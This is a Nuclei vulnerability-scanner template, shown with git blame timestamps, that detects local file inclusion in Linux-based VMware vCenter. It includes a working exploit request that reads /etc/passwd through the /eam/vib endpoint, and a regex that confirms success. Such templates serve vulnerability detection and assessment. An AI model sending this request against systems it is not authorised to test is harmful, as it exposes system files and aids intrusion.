nuclei-templates/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml

23 lines
526 B
YAML
Raw Normal View History

id: vmware-vcenter-lfi-linux
info:
name: Linux Vmware Vcenter - Local File Inclusion
author: PR3R00T
2020-12-14 19:44:06 +00:00
severity: high
description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2023-03-02 19:06:32 +00:00
tags: vmware,lfi,vcenter,linux
requests:
- method: GET
path:
2023-03-02 19:03:52 +00:00
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
2023-03-02 19:06:32 +00:00
matchers:
2023-03-02 19:03:52 +00:00
- type: regex
regex:
- "root:.*:0:0:"